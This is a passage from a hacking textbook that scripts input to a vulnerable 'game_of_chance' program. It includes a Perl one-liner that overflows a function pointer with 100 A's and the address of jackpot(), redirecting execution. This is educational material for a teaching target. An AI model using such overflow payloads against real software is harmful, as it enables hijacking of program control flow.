Exploitation 161input. These selections will be made as if they were typed. The following
example will choose menu item 1, try to guess the number 7, select n when
asked to play again, and finally select menu item 7 to quit.
reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n7\n"' | ./game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!
10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 20
Sorry, you didn't win.
You now have 50 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->
Thanks for playing! Bye.
reader@hacking:~/booksrc $
This same technique can be used to script everything needed for the
exploit. The following line will play the Pick a Number game once, then
change the username to 100 A’s followed by the address of the jackpot()
function. This will overflow the current_game function pointer, so when
the Pick a Number game is played again, the jackpot() function is called
directly.
reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n". "A"x100. "\x70\
x8d\x04\x08\n". "1\nn\n". "7\n"'
1
5